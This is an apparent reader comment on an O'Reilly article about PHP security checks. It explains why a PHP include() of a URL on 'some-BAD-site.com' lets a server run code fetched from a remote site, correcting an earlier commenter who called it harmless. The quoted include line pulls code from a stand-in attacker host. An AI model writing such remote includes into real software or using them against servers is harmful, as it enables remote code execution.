Article:  |
Ten Security Checks for PHP, Part 1 | |
| Subject: | Not the kind of article i would expect from o'reilly! | |
| Date: | 2005-02-06 03:49:12 | |
| From: | bbbbbbbbbbbbbb | |
|
Response to: Not the kind of article i would expect from o'reilly!
|
||
|
"First, include("http://www.some-BAD-site.com/whatever.php") can't really do any harm, since it is executed on the some-bad-site.com, and not on the targeted machine."
|
||
Showing messages 1 through 1 of 1.
Resource Management: A Critical Look at RAII Michael Feathers
The Logs That Bind.. Michael Feathers
Outside the Design Boundary Michael Feathers
Can a program lie to you the way a story or essay can? Andy Oram
Contact Us | Advertise with Us | Privacy Policy | Press Center | Jobs
Copyright © 2000-2008 O'Reilly Media, Inc. All Rights Reserved. | (707) 827-7000 / (800) 998-9938
All trademarks and registered trademarks appearing on the O'Reilly Network are the property of their respective owners.
For problems or assistance with this site, email
No, in fact it is assumed that www.some-BAD-site.com is NOT running PHP and it provides raw PHP code to the server that runs the include statement. This is the essence of this security risk - the PHP engine will execute PHP code loaded from a different web site.